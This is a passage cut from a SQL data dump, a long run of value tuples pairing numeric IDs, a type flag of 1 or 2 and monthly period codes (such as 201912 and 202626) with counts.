,'202625',3),(3229,1,'202625',3),(3489,1,'202625',3),(3721,1,'202625',3),(3752,1,'202625',3),(4750,1,'202625',3),(4797,1,'202625',3),(4976,1,'202625',3),(5314,1,'202625',3),(5578,1,'202625',3),(106,1,'202625',4),(478,1,'202625',4),(3482,1,'202625',4),(3534,1,'202625',4),(3771,1,'202625',4),(4326,1,'202625',4),(4332,1,'202625',4),(4663,1,'202625',4),(4759,1,'202625',4),(4897,1,'202625',4),(5024,1,'202625',4),(5028,1,'202625',4),(5080,1,'202625',4),(5271,1,'202625',4),(5425,1,'202625',4),(5441,1,'202625',4),(5585,1,'202625',4),(5662,1,'202625',4),(5666,1,'202625',4),(479,1,'202625',5),(481,1,'202625',5),(1726,1,'202625',5),(2154,1,'202625',5),(2956,1,'202625',5),(3041,1,'202625',5),(3092,1,'202625',5),(3107,1,'202625',5),(3243,1,'202625',5),(3245,1,'202625',5),(3257,1,'202625',5),(3261,1,'202625',5),(3316,1,'202625',5),(3531,1,'202625',5),(3742,1,'202625',5),(3774,1,'202625',5),(4329,1,'202625',5),(4338,1,'202625',5),(4357,1,'202625',5),(4387,1,'202625',5),(4400,1,'202625',5),(4428,1,'202625',5),(4524,1,'202625',5),(4587,1,'202625',5),(4645,1,'202625',5),(4651,1,'202625',5),(4657,1,'202625',5),(4753,1,'202625',5),(4765,1,'202625',5),(4776,1,'202625',5),(4983,1,'202625',5),(5125,1,'202625',5),(5248,1,'202625',5),(5472,1,'202625',5),(5582,1,'202625',5),(110,1,'202625',6),(1610,1,'202625',6),(1737,1,'202625',6),(1745,1,'202625',6),(1749,1,'202625',6),(1751,1,'202625',6),(1774,1,'202625',6),(1782,1,'202625',6),(2252,1,'202625',6),(2296,1,'202625',6),(2775,1,'202625',6),(2809,1,'202625',6),(3030,1,'202625',6),(3072,1,'202625',6),(3117,1,'202625',6),(3127,1,'202625',6),(3269,1,'202625',6),(3746,1,'202625',6),(4391,1,'202625',6),(4396,1,'202625',6),(4454,1,'202625',6),(4648,1,'202625',6),(4668,1,'202625',6),(4674,1,'202625',6),(4688,1,'202625',6),(4771,1,'202625',6),(4862,1,'202625',6),(4893,1,'202625',6),(5163,1,'202625',6),(5289,1,'202625',6),(5292,1,'202625',6),(5353,1,'202625',6),(5683,1,'202625',6),(484,1,'202625',7),(1600,1,'202625',7),(2161,1,'202625',7),(2248,1,'202625',7),(2748,1,'202625',7),(2965,1,'202625',7),(3104,1,'202625',7),(3259,1,'202625',7),(3271,1,'202625',7),(3273,1,'202625',7),(3278,1,'202625',7),(3280,1,'202625',7),(3282,1,'202625',7),(3285,1,'202625',7),(3479,1,'202625',7),(3714,1,'202625',7),(3749,1,'202625',7),(4275,1,'202625',7),(4341,1,'202625',7),(4377,1,'202625',7),(4408,1,'202625',7),(4424,1,'202625',7),(4546,1,'202625',7),(4556,1,'202625',7),(4591,1,'202625',7),(4694,1,'202625',7),(4756,1,'202625',7),(4792,1,'202625',7),(4866,1,'202625',7),(5268,1,'202625',7),(5310,1,'202625',7),(5317,1,'202625',7),(5320,1,'202625',7),(5374,1,'202625',7),(5383,1,'202625',7),(5428,1,'202625',7),(5464,1,'202625',7),(5570,1,'202625',7),(482,1,'202625',8),(483,1,'202625',8),(1709,1,'202625',8),(1711,1,'202625',8),(1720,1,'202625',8),(1732,1,'202625',8),(1743,1,'202625',8),(1768,1,'202625',8),(2558,1,'202625',8),(2911,1,'202625',8),(3045,1,'202625',8),(3066,1,'202625',8),(3087,1,'202625',8),(3265,1,'202625',8),(3267,1,'202625',8),(3287,1,'202625',8),(3541,1,'202625',8),(3727,1,'202625',8),(3731,1,'202625',8),(3764,1,'202625',8),(3777,1,'202625',8),(4382,1,'202625',8),(4412,1,'202625',8),(4529,1,'202625',8),(4551,1,'202625',8),(4660,1,'202625',8),(4703,1,'202625',8),(4741,1,'202625',8),(4762,1,'202625',8),(4768,1,'202625',8),(5020,1,'202625',8),(5033,1,'202625',8),(5050,1,'202625',8),(5062,1,'202625',8),(5122,1,'202625',8),(5134,1,'202625',8),(5157,1,'202625',8),(5301,1,'202625',8),(5330,1,'202625',8),(5334,1,'202625',8),(5512,1,'202625',8),(5515,1,'202625',8),(5605,1,'202625',8),(5609,1,'202625',8),(5636,1,'202625',8),(486,1,'202625',9),(1606,1,'202625',9),(1695,1,'202625',9),(1697,1,'202625',9),(1722,1,'202625',9),(1734,1,'202625',9),(1772,1,'202625',9),(1776,1,'202625',9),(2165,1,'202625',9),(2178,1,'202625',9),(2804,1,'202625',9),(2989,1,'202625',9),(3240,1,'202625',9),(3249,1,'202625',9),(3251,1,'202625',9),(3290,1,'202625',9),(3307,1,'202625',9),(3313,1,'202625',9),(3430,1,'202625',9),(3724,1,'202625',9),(4368,1,'202625',9),(4432,1,'202625',9),(4440,1,'202625',9),(4448,1,'202625',9),(4457,1,'202625',9),(4654,1,'202625',9),(4697,1,'202625',9),(4700,1,'202625',9),(4709,1,'202625',9),(4744,1,'202625',9),(4870,1,'202625',9),(4888,1,'202625',9),(4977,1,'202625',9),(4988,1,'202625',9),(4996,1,'202625',9),(5042,1,'202625',9),(5046,1,'202625',9),(5054,1,'202625',9),(5140,1,'202625',9),(5256,1,'202625',9),(5264,1,'202625',9),(5298,1,'202625',9),(5323,1,'202625',9),(5359,1,'202625',9),(5449,1,'202625',9),(5461,1,'202625',9),(5561,1,'202625',9),(5785,1,'202625',9),(5868,1,'202625',9),(471,1,'202625',10),(476,1,'202625',10),(480,1,'202625',10),(485,1,'202625',10),(1699,1,'202625',10),(1705,1,'202625',10),(1707,1,'202625',10),(1713,1,'202625',10),(1724,1,'202625',10),(1730,1,'202625',10),(1739,1,'202625',10),(2609,1,'202625',10),(2964,1,'202625',10),(2991,1,'202625',10),(2993,1,'202625',10),(3006,1,'202625',10),(3034,1,'202625',10),(3063,1,'202625',10),(3069,1,'202625',10),(3090,1,'202625',10),(3097,1,'202625',10),(3486,1,'202625',10),(3498,1,'202625',10),(4404,1,'202625',10),(4416,1,'202625',10),(4444,1,'202625',10),(4677,1,'202625',10),(4685,1,'202625',10),(4706,1,'202625',10),(4802,1,'202625',10),(4874,1,'202625',10),(5037,1,'202625',10),(5067,1,'202625',10),(5128,1,'202625',10),(5131,1,'202625',10),(5146,1,'202625',10),(5280,1,'202625',10),(5295,1,'202625',10),(5420,1,'202625',10),(5598,1,'202625',10),(5844,1,'202625',10),(5865,1,'202625',10),(488,1,'202625',11),(1604,1,'202625',11),(1701,1,'202625',11),(1703,1,'202625',11),(1766,1,'202625',11),(2063,1,'202625',11),(2152,1,'202625',11),(2156,1,'202625',11),(3023,1,'202625',11),(3027,1,'202625',11),(3038,1,'202625',11),(3096,1,'202625',11),(3109,1,'202625',11),(3263,1,'202625',11),(3438,1,'202625',11),(4335,1,'202625',11),(4566,1,'202625',11),(4582,1,'202625',11),(4681,1,'202625',11),(4722,1,'202625',11),(4883,1,'202625',11),(4980,1,'202625',11),(5058,1,'202625',11),(5137,1,'202625',11),(5304,1,'202625',11),(5356,1,'202625',11),(5400,1,'202625',11),(5412,1,'202625',11),(5433,1,'202625',11),(5674,1,'202625',11),(5696,1,'202625',11),(5816,1,'202625',11),(1590,1,'202625',12),(1592,1,'202625',12),(1598,1,'202625',12),(2148,1,'202625',12),(2150,1,'202625',12),(2457,1,'202625',12),(2704,1,'202625',12),(2751,1,'202625',12),(3124,1,'202625',12),(3297,1,'202625',12),(4520,1,'202625',12),(4542,1,'202625',12),(4712,1,'202625',12),(5071,1,'202625',12),(5253,1,'202625',12),(5276,1,'202625',12),(5326,1,'202625',12),(5601,1,'202625',12),(5735,1,'202625',12),(5762,1,'202625',12),(5821,1,'202625',12),(5833,1,'202625',12),(5917,1,'202625',12),(469,1,'202625',13),(1608,1,'202625',13),(1741,1,'202625',13),(1770,1,'202625',13),(3226,1,'202625',13),(3275,1,'202625',13),(4301,1,'202625',13),(4373,1,'202625',13),(4608,1,'202625',13),(4878,1,'202625',13),(5101,1,'202625',13),(5492,1,'202625',13),(5875,1,'202625',13),(5884,1,'202625',13),(5889,1,'202625',13),(1612,1,'202625',14),(1718,1,'202625',14),(1780,1,'202625',14),(2297,1,'202625',14),(2617,1,'202625',14),(2801,1,'202625',14),(3004,1,'202625',14),(3005,1,'202625',14),(3247,1,'202625',14),(4747,1,'202625',14),(5307,1,'202625',14),(5378,1,'202625',14),(5467,1,'202625',14),(5828,1,'202625',14),(467,1,'202625',15),(472,1,'202625',15),(1544,1,'202625',15),(3253,1,'202625',15),(3710,1,'202625',15),(4436,1,'202625',15),(4612,1,'202625',15),(5363,1,'202625',15),(5567,1,'202625',15),(5881,1,'202625',15),(5921,1,'202625',15),(1594,1,'202625',16),(1596,1,'202625',16),(2159,1,'202625',16),(4238,1,'202625',16),(4363,1,'202625',16),(5153,1,'202625',16),(5415,1,'202625',16),(5626,1,'202625',16),(102,1,'202625',17),(1715,1,'202625',17),(2658,1,'202625',17),(3083,1,'202625',17),(5454,1,'202625',17),(5738,1,'202625',17),(5872,1,'202625',17),(5925,1,'202625',17),(1614,1,'202625',18),(2309,1,'202625',18),(3060,1,'202625',18),(1778,1,'202625',19),(5259,1,'202625',19),(5409,1,'202625',19),(5902,1,'202625',19),(5930,1,'202625',19),(570,1,'202625',20),(1588,1,'202625',20),(2769,1,'202625',20),(4420,1,'202625',20),(5406,1,'202625',20),(5700,1,'202625',20),(5771,1,'202625',20),(1582,1,'202625',21),(1586,1,'202625',21),(5778,1,'202625',21),(108,1,'202625',22),(473,1,'202625',22),(5457,1,'202625',22),(5502,1,'202625',22),(5593,1,'202625',22),(1728,1,'202625',23),(1747,1,'202625',23),(5906,1,'202625',23),(1584,1,'202625',24),(4930,1,'202625',24),(5436,1,'202625',24),(5769,1,'202625',24),(5910,1,'202625',24),(2813,1,'202625',25),(5489,1,'202625',25),(5824,1,'202625',25),(3102,1,'202625',26),(5076,1,'202625',26),(5878,1,'202625',26),(5961,1,'202625',26),(5847,1,'202625',27),(2503,1,'202625',29),(487,1,'202625',30),(5397,1,'202625',31),(5964,1,'202625',31),(74,1,'202625',32),(1602,1,'202625',32),(76,1,'202625',33),(87,1,'202625',33),(5975,1,'202625',33),(468,1,'202625',34),(470,1,'202625',34),(5945,1,'202625',34),(474,1,'202625',35),(5967,1,'202625',35),(5859,1,'202625',36),(3781,1,'202625',37),(2904,1,'202625',39),(5986,1,'202625',39),(335,1,'202625',40),(84,1,'202625',41),(89,1,'202625',51),(5950,1,'202625',73),(91,1,'202625',89),(80,1,'202625',90),(72,1,'202625',104),(9,1,'202625',4370),(74,1,'202626',1),(80,1,'202626',1),(84,1,'202626',1),(91,1,'202626',1),(106,1,'202626',1),(108,1,'202626',1),(335,1,'202626',1),(468,1,'202626',1),(469,1,'202626',1),(476,1,'202626',1),(480,1,'202626',1),(483,1,'202626',1),(484,1,'202626',1),(485,1,'202626',1),(1588,1,'202626',1),(1596,1,'202626',1),(1600,1,'202626',1),(1604,1,'202626',1),(1711,1,'202626',1),(1724,1,'202626',1),(1739,1,'202626',1),(1778,1,'202626',1),(1782,1,'202626',1),(2063,1,'202626',1),(2252,1,'202626',1),(2503,1,'202626',1),(2965,1,'202626',1),(3004,1,'202626',1),(3006,1,'202626',1),(3034,1,'202626',1),(3038,1,'202626',1),(3060,1,'202626',1),(3069,1,'202626',1),(3072,1,'202626',1),(3090,1,'202626',1),(3117,1,'202626',1),(3297,1,'202626',1),(3531,1,'202626',1),(3764,1,'202626',1),(3777,1,'202626',1),(4323,1,'202626',1),(4357,1,'202626',1),(4382,1,'202626',1),(4514,1,'202626',1),(4524,1,'202626',1),(4660,1,'202626',1),(4712,1,'202626',1),(4741,1,'202626',1),(4747,1,'202626',1),(4976,1,'202626',1),(5037,1,'202626',1),(5071,1,'202626',1),(5076,1,'202626',1),(5256,1,'202626',1),(5295,1,'202626',1),(5298,1,'202626',1),(5304,1,'202626',1),(5310,1,'202626',1),(5320,1,'202626',1),(5334,1,'202626',1),(5353,1,'202626',1),(5374,1,'202626',1),(5409,1,'202626',1),(5425,1,'202626',1),(5433,1,'202626',1),(5436,1,'202626',1),(5449,1,'202626',1),(5454,1,'202626',1),(5561,1,'202626',1),(5582,1,'202626',1),(5696,1,'202626',1),(5735,1,'202626',1),(5778,1,'202626',1),(5785,1,'202626',1),(5821,1,'202626',1),(5828,1,'202626',1),(5844,1,'202626',1),(5865,1,'202626',1),(5875,1,'202626',1),(5878,1,'202626',1),(5884,1,'202626',1),(5902,1,'202626',1),(5917,1,'202626',1),(5925,1,'202626',1),(5964,1,'202626',1),(5967,1,'202626',1),(76,1,'202626',2),(87,1,'202626',2),(470,1,'202626',2),(473,1,'202626',2),(487,1,'202626',2),(1584,1,'202626',2),(1594,1,'202626',2),(1598,1,'202626',2),(1602,1,'202626',2),(4329,1,'202626',2),(4608,1,'202626',2),(4930,1,'202626',2),(5054,1,'202626',2),(5605,1,'202626',2),(5662,1,'202626',2),(5910,1,'202626',2),(5930,1,'202626',2),(5975,1,'202626',2),(5986,1,'202626',2),(72,1,'202626',3),(2558,1,'202626',3),(5585,1,'202626',3),(5738,1,'202626',3),(5906,1,'202626',3),(5945,1,'202626',3),(5961,1,'202626',3),(89,1,'202626',4),(2904,1,'202626',5),(5593,1,'202626',5),(5881,1,'202626',5),(474,1,'202626',6),(9,1,'202626',165),(1582,2,'201911',1),(2704,2,'201911',1),(2801,2,'201911',1),(2813,2,'201911',1),(1598,2,'201911',8),(480,2,'201912',1),(484,2,'201912',1),(485,2,'201912',1),(570,2,'201912',1),(1584,2,'201912',1),(1590,2,'201912',1),(1606,2,'201912',1),(1608,2,'201912',1),(1695,2,'201912',1),(1711,2,'201912',1),(1726,2,'201912',1),(1728,2,'201912',1),(1737,2,'201912',1),(1772,2,'201912',1),(1774,2,'201912',1),(1782,2,'201912',1),(2154,2,'201912',1),(2558,2,'201912',1),(2617,2,'201912',1),(467,2,'201912',2),(468,2,'201912',2),(469,2,'201912',2),(471,2,'201912',2),(478,2,'201912',2),(482,2,'201912',2),(483,2,'201912',2),(488,2,'201912',2),(1544,2,'201912',2),(1586,2,'201912',2),(1588,2,'201912',2),(1594,2,'201912',2),(1602,2,'201912',2),(1703,2,'201912',2),(1707,2,'201912',2),(1709,2,'201912',2),(1718,2,'201912',2),(1745,2,'201912',2),(1751,2,'201912',2),(1766,2,'201912',2),(1778,2,'201912',2),(1780,2,'201912',2),(2150,2,'201912',2),(2152,2,'201912',2),(2156,2,'201912',2),(2165,2,'201912',2),(2296,2,'201912',2),(2704,2,'201912',2),(2748,2,'201912',2),(470,2,'201912',3),(486,2,'201912',3),(487,2,'201912',3),(1582,2,'201912',3),(1598,2,'201912',3),(1600,2,'201912',3),(1612,2,'201912',3),(1614,2,'201912',3),(1701,2,'201912',3),(1720,2,'201912',3),(1743,2,'201912',3),(1747,2,'201912',3),(1749,2,'201912',3),(2159,2,'201912',3),(2252,2,'201912',3),(2293,2,'201912',3),(2457,2,'201912',3),(477,2,'201912',4),(1697,2,'201912',4),(1730,2,'201912',4),(2148,2,'201912',4),(1699,2,'201912',5),(1768,2,'201912',5),(1776,2,'201912',5),(2297,2,'201912',5),(2769,2,'201912',5),(2813,2,'201912',5),(2178,2,'201912',6),(2809,2,'201912',6),(474,2,'201912',7),(2248,2,'201912',7),(1713,2,'201912',8),(2775,2,'201912',8),(473,2,'201912',9),(2911,2,'201912',10),(2801,2,'201912',19),(2658,2,'201912',25),(2804,2,'201912',25),(2609,2,'201912',26),(2309,2,'201912',27),(2751,2,'201912',30),(1614,2,'202001',2),(1695,2,'202001',2),(1711,2,'202001',2),(1715,2,'202001',2),(1747,2,'202001',2),(2156,2,'202001',2),(2558,2,'202001',2),(486,2,'202001',3),(488,2,'202001',3),(1596,2,'202001',3),(1608,2,'202001',3),(1610,2,'202001',3),(1703,2,'202001',3),(1707,2,'202001',3),(1741,2,'202001',3),(2252,2,'202001',3),(2617,2,'202001',3),(2704,2,'202001',3),(477,2,'202001',4),(478,2,'202001',4),(479,2,'202001',4),(480,2,'202001',4),(482,2,'202001',4),(483,2,'202001',4),(484,2,'202001',4),(1705,2,'202001',4),(1734,2,'202001',4),(1739,2,'202001',4),(1749,2,'202001',4),(1780,2,'202001',4),(2148,2,'202001',4),(2152,2,'202001',4),(2154,2,'202001',4),(2296,2,'202001',4),(2748,2,'202001',4),(472,2,'202001',5),(481,2,'202001',5),(570,2,'202001',5),(1544,2,'202001',5),(1584,2,'202001',5),(1586,2,'202001',5),(1588,2,'202001',5),(1590,2,'202001',5),(1594,2,'202001',5),(1724,2,'202001',5),(1732,2,'202001',5),(1737,2,'202001',5),(1745,2,'202001',5),(1751,2,'202001',5),(1770,2,'202001',5),(2150,2,'202001',5),(2165,2,'202001',5),(2293,2,'202001',5),(2769,2,'202001',5),(467,2,'202001',6),(469,2,'202001',6),(476,2,'202001',6),(485,2,'202001',6),(487,2,'202001',6),(1600,2,'202001',6),(1602,2,'202001',6),(1612,2,'202001',6),(1772,2,'202001',6),(1778,2,'202001',6),(1782,2,'202001',6),(2063,2,'202001',6),(2161,2,'202001',6),(2248,2,'202001',6),(2775,2,'202001',6),(470,2,'202001',7),(1592,2,'202001',7),(1598,2,'202001',7),(1604,2,'202001',7),(1697,2,'202001',7),(1709,2,'202001',7),(1718,2,'202001',7),(1728,2,'202001',7),(1743,2,'202001',7),(1768,2,'202001',7),(2159,2,'202001',7),(474,2,'202001',8),(1699,2,'202001',8),(1701,2,'202001',8),(1776,2,'202001',8),(2178,2,'202001',8),(1766,2,'202001',9),(2297,2,'202001',9),(2457,2,'202001',9),(2809,2,'202001',9),(468,2,'202001',10),(471,2,'202001',10),(473,2,'202001',10),(1720,2,'202001',10),(1726,2,'202001',10),(1582,2,'202001',11),(1713,2,'202001',11),(1722,2,'202001',12),(1774,2,'202001',12),(1606,2,'202001',15),(2804,2,'202001',24),(2911,2,'202001',24),(2801,2,'202001',30),(2751,2,'202001',32),(2658,2,'202001',34),(2813,2,'202001',35),(1730,2,'202001',46),(2609,2,'202001',47),(2309,2,'202001',57),(2964,2,'202002',1),(2991,2,'202002',1),(3004,2,'202002',1),(3006,2,'202002',1),(3005,2,'202002',2),(2965,2,'202002',3),(2989,2,'202002',3),(2993,2,'202002',3),(477,2,'202002',5),(486,2,'202002',5),(1610,2,'202002',5),(1711,2,'202002',5),(2165,2,'202002',5),(478,2,'202002',6),(482,2,'202002',6),(1584,2,'202002',6),(1594,2,'202002',6),(1598,2,'202002',6),(1602,2,'202002',6),(1695,2,'202002',6),(1709,2,'202002',6),(1715,2,'202002',6),(1776,2,'202002',6),(2154,2,'202002',6),(2156,2,'202002',6),(2748,2,'202002',6),(472,2,'202002',7),(476,2,'202002',7),(481,2,'202002',7),(483,2,'202002',7),(484,2,'202002',7),(485,2,'202002',7),(1590,2,'202002',7),(1592,2,'202002',7),(1606,2,'202002',7),(1608,2,'202002',7),(1768,2,'202002',7),(2063,2,'202002',7),(2161,2,'202002',7),(2248,2,'202002',7),(2296,2,'202002',7),(2617,2,'202002',7),(467,2,'202002',8),(480,2,'202002',8),(1705,2,'202002',8),(1739,2,'202002',8),(1743,2,'202002',8),(1770,2,'202002',8),(1778,2,'202002',8),(1780,2,'202002',8),(2252,2,'202002',8),(487,2,'202002',9),(1544,2,'202002',9),(1586,2,'202002',9),(1612,2,'202002',9),(1614,2,'202002',9),(1699,2,'202002',9),(1703,2,'202002',9),(1734,2,'202002',9),(1745,2,'202002',9),(2150,2,'202002',9),(2159,2,'202002',9),(2297,2,'202002',9),(2809,2,'202002',9),(473,2,'202002',10),(479,2,'202002',10),(488,2,'202002',10),(1582,2,'202002',10),(1749,2,'202002',10),(2558,2,'202002',10),(2704,2,'202002',10),(468,2,'202002',11),(474,2,'202002',11),(1697,2,'202002',11),(1713,2,'202002',11),(1741,2,'202002',11),(2178,2,'202002',11),(2293,2,'202002',11),(2775,2,'202002',11),(469,2,'202002',12),(470,2,'202002',12),(1596,2,'202002',12),(1707,2,'202002',12),(1724,2,'202002',12),(1732,2,'202002',12),(1766,2,'202002',12),(1701,2,'202002',13),(1726,2,'202002',13),(1772,2,'202002',13),(1782,2,'202002',13),(2152,2,'202002',13),(1751,2,'202002',14),(2813,2,'202002',14),(1737,2,'202002',15),(471,2,'202002',16),(1604,2,'202002',16),(1718,2,'202002',16),(2769,2,'202002',16),(2956,2,'202002',16),(570,2,'202002',17),(1774,2,'202002',17),(2457,2,'202002',17),(2751,2,'202002',17),(2804,2,'202002',17),(1600,2,'202002',18),(1720,2,'202002',18),(2148,2,'202002',18),(1747,2,'202002',19),(1722,2,'202002',20),(2658,2,'202002',20),(1588,2,'202002',21),(2911,2,'202002',22),(1728,2,'202002',27),(2801,2,'202002',31),(1730,2,'202002',36),(2609,2,'202002',37),(2309,2,'202002',82),(1610,2,'202003',5),(3041,2,'202003',5),(476,2,'202003',6),(1612,2,'202003',6),(1739,2,'202003',6),(1751,2,'202003',6),(2063,2,'202003',6),(2248,2,'202003',6),(2704,2,'202003',6),(477,2,'202003',7),(1544,2,'202003',7),(1711,2,'202003',7),(2297,2,'202003',7),(2809,2,'202003',7),(2965,2,'202003',7),(478,2,'202003',8),(479,2,'202003',8),(486,2,'202003',8),(488,2,'202003',8),(1590,2,'202003',8),(1594,2,'202003',8),(1602,2,'202003',8),(1707,2,'202003',8),(1715,2,'202003',8),(1720,2,'202003',8),(1772,2,'202003',8),(2156,2,'202003',8),(2159,2,'202003',8),(2964,2,'202003',8),(3005,2,'202003',8),(3006,2,'202003',8),(480,2,'202003',9),(484,2,'202003',9),(485,2,'202003',9),(1596,2,'202003',9),(1705,2,'202003',9),(1724,2,'202003',9),(1734,2,'202003',9),(1770,2,'202003',9),(2252,2,'202003',9),(2558,2,'202003',9),(2617,2,'202003',9),(3045,2,'202003',9),(467,2,'202003',10),(1584,2,'202003',10),(1703,2,'202003',10),(1726,2,'202003',10),(1728,2,'202003',10),(1778,2,'202003',10),(469,2,'202003',11),(472,2,'202003',11),(481,2,'202003',11),(1586,2,'202003',11),(1592,2,'202003',11),(1697,2,'202003',11),(1718,2,'202003',11),(1749,2,'202003',11),(1776,2,'202003',11),(1780,2,'202003',11),(2161,2,'202003',11),(2293,2,'202003',11),(2296,2,'202003',11),(2748,2,'202003',11),(3004,2,'202003',11),(483,2,'202003',12),(1604,2,'202003',12),(1699,2,'202003',12),(1743,2,'202003',12),(1745,2,'202003',12),(1747,2,'202003',12),(1774,2,'202003',12),(2150,2,'202003',12),(471,2,'202003',13),(474,2,'202003',13),(487,2,'202003',13),(1701,2,'202003',13),(1737,2,'202003',13),(1768,2,'202003',13),(2152,2,'202003',13),(2154,2,'202003',13),(2165,2,'202003',13),(1766,2,'202003',14),(2457,2,'202003',14),(3027,2,'202003',14),(570,2,'202003',15),(1608,2,'202003',15),(1713,2,'202003',15),(1732,2,'202003',15),(1741,2,'202003',15),(1782,2,'202003',15),(2804,2,'202003',15),(2991,2,'202003',15),(2993,2,'202003',15),(470,2,'202003',16),(473,2,'202003',16),(1709,2,'202003',16),(1722,2,'202003',16),(2658,2,'202003',16),(2911,2,'202003',16),(468,2,'202003',17),(482,2,'202003',17),(2769,2,'202003',17),(2813,2,'202003',17),(1582,2,'202003',18),(2148,2,'202003',18),(1598,2,'202003',19),(2178,2,'202003',19),(2775,2,'202003',19),(2989,2,'202003',19),(3023,2,'202003',19),(1695,2,'202003',21),(1614,2,'202003',22),(2956,2,'202003',22),(1730,2,'202003',24),(3038,2,'202003',24),(1606,2,'202003',25),(2801,2,'202003',27),(3030,2,'202003',27),(3034,2,'202003',31),(2751,2,'202003',37),(1588,2,'202003',45),(2609,2,'202003',54),(1600,2,'202003',59),(2309,2,'202003',63),(3006,2,'202004',5),(471,2,'202004',6),(472,2,'202004',6),(478,2,'202004',6),(477,2,'202004',7),(1602,2,'202004',7),(1695,2,'202004',7),(1734,2,'202004',8),(476,2,'202004',9),(488,2,'202004',9),(1544,2,'202004',9),(1584,2,'202004',9),(1705,2,'202004',9),(2558,2,'202004',9),(2748,2,'202004',9),(479,2,'202004',10),(480,2,'202004',10),(481,2,'202004',10),(483,2,'202004',10),(1711,2,'202004',10),(1713,2,'202004',10),(1724,2,'202004',10),(1766,2,'202004',10),(2775,2,'202004',10),(2804,2,'202004',10),(482,2,'202004',11),(1697,2,'202004',11),(2161,2,'202004',11),(2293,2,'202004',11),(2296,2,'202004',11),(2658,2,'202004',11),(2704,2,'202004',11),(2964,2,'202004',11),(3004,2,'202004',11),(3023,2,'202004',11),(468,2,'202004',12),(469,2,'202004',12),(470,2,'202004',12),(474,2,'202004',12),(1592,2,'202004',12),(1594,2,'202004',12),(1608,2,'202004',12),(1699,2,'202004',12),(1720,2,'202004',12),(1732,2,'202004',12),(1743,2,'202004',12),(1780,2,'202004',12),(2150,2,'202004',12),(2154,2,'202004',12),(2165,2,'202004',12),(2617,2,'202004',12),(2965,2,'202004',12),(484,2,'202004',13),(1586,2,'202004',13),(1590,2,'202004',13),(1596,2,'202004',13),(1598,2,'202004',13),(1610,2,'202004',13),(1701,2,'202004',13),(1715,2,'202004',13),(1739,2,'202004',13),(1745,2,'202004',13),(1751,2,'202004',13),(1772,2,'202004',13),(1774,2,'202004',13),(1776,2,'202004',13),(1782,2,'202004',13),(2148,2,'202004',13),(3005,2,'202004',13),(467,2,'202004',14),(485,2,'202004',14),(1612,2,'202004',14),(1707,2,'202004',14),(1709,2,'202004',14),(1718,2,'202004',14),(1768,2,'202004',14),(1778,2,'202004',14),(2159,2,'202004',14),(2991,2,'202004',14),(3041,2,'202004',14),(487,2,'202004',15),(570,2,'202004',15),(1703,2,'202004',15),(1741,2,'202004',15),(1747,2,'202004',15),(2252,2,'202004',15),(2989,2,'202004',15),(1582,2,'202004',16),(1614,2,'202004',16),(1726,2,'202004',16),(1728,2,'202004',16),(1737,2,'202004',16),(1749,2,'202004',16),(1770,2,'202004',16),(2248,2,'202004',16),(2063,2,'202004',17),(2911,2,'202004',17),(473,2,'202004',18),(2156,2,'202004',18),(2809,2,'202004',18),(3038,2,'202004',18),(486,2,'202004',19),(2152,2,'202004',19),(2178,2,'202004',20),(2751,2,'202004',20),(1606,2,'202004',22),(2297,2,'202004',22),(2457,2,'202004',22),(2993,2,'202004',22),(3030,2,'202004',22),(1604,2,'202004',23),(2956,2,'202004',23),(3027,2,'202004',23),(3034,2,'202004',23),(1722,2,'202004',24),(2813,2,'202004',24),(3045,2,'202004',28),(2769,2,'202004',31),(2801,2,'202004',33),(1730,2,'202004',34),(2309,2,'202004',50),(2609,2,'202004',53),(1588,2,'202004',65),(1600,2,'202004',69),(1590,2,'202005',8),(1770,2,'202005',8),(2156,2,'202005',9),(1596,2,'202005',10),(1705,2,'202005',10),(1709,2,'202005',10),(1711,2,'202005',10),(1715,2,'202005',10),(1726,2,'202005',10),(1739,2,'202005',10),(2293,2,'202005',10),(2296,2,'202005',10),(467,2,'202005',11),(479,2,'202005',11),(481,2,'202005',11),(1749,2,'202005',11),(1768,2,'202005',11),(1780,2,'202005',11),(472,2,'202005',12),(476,2,'202005',12),(478,2,'202005',12),(482,2,'202005',12),(484,2,'202005',12),(485,2,'202005',12),(1584,2,'202005',12),(1713,2,'202005',12),(1724,2,'202005',12),(1743,2,'202005',12),(1766,2,'202005',12),(1782,2,'202005',12),(2150,2,'202005',12),(2161,2,'202005',12),(2297,2,'202005',12),(2558,2,'202005',12),(2704,2,'202005',12),(2748,2,'202005',12),(3027,2,'202005',12),(468,2,'202005',13),(469,2,'202005',13),(471,2,'202005',13),(480,2,'202005',13),(483,2,'202005',13),(488,2,'202005',13),(1602,2,'202005',13),(1608,2,'202005',13),(1612,2,'202005',13),(1697,2,'202005',13),(1699,2,'202005',13),(1707,2,'202005',13),(1732,2,'202005',13),(1776,2,'202005',13),(2152,2,'202005',13),(2617,2,'202005',13),(2809,2,'202005',13),(2989,2,'202005',13),(477,2,'202005',14),(1610,2,'202005',14),(1695,2,'202005',14),(1703,2,'202005',14),(1728,2,'202005',14),(1745,2,'202005',14),(2165,2,'202005',14),(2178,2,'202005',14),(2252,2,'202005',14),(2964,2,'202005',14),(3023,2,'202005',14),(1586,2,'202005',15),(1701,2,'202005',15),(1720,2,'202005',15),(1747,2,'202005',15),(1751,2,'202005',15),(1774,2,'202005',15),(1778,2,'202005',15),(2148,2,'202005',15),(2965,2,'202005',15),(2991,2,'202005',15),(3004,2,'202005',15),(3005,2,'202005',15),(470,2,'202005',16),(1594,2,'202005',16),(1614,2,'202005',16),(1718,2,'202005',16),(1737,2,'202005',16),(2063,2,'202005',16),(2248,2,'202005',16),(2775,2,'202005',16),(2993,2,'202005',16),(1772,2,'202005',17),(2658,2,'202005',17),(2911,2,'202005',17),(474,2,'202005',18),(1544,2,'202005',18),(1598,2,'202005',18),(1606,2,'202005',18),(2769,2,'202005',18),(3006,2,'202005',18),(3034,2,'202005',18),(3041,2,'202005',18),(1722,2,'202005',19),(1734,2,'202005',19),(2159,2,'202005',19),(2804,2,'202005',19),(570,2,'202005',20),(473,2,'202005',21),(1741,2,'202005',21),(2813,2,'202005',21),(486,2,'202005',22),(487,2,'202005',22),(3045,2,'202005',22),(1592,2,'202005',23),(1604,2,'202005',24),(2457,2,'202005',24),(3030,2,'202005',24),(2154,2,'202005',25),(3038,2,'202005',25),(1582,2,'202005',26),(2956,2,'202005',26),(1730,2,'202005',27),(2801,2,'202005',32),(2751,2,'202005',33),(2609,2,'202005',34),(1588,2,'202005',43),(2309,2,'202005',44),(1600,2,'202005',70),(3097,2,'202006',4),(3087,2,'202006',5),(3092,2,'202006',5),(3083,2,'202006',6),(476,2,'202006',7),(3079,2,'202006',7),(3096,2,'202006',7),(1780,2,'202006',8),(3081,2,'202006',8),(467,2,'202006',9),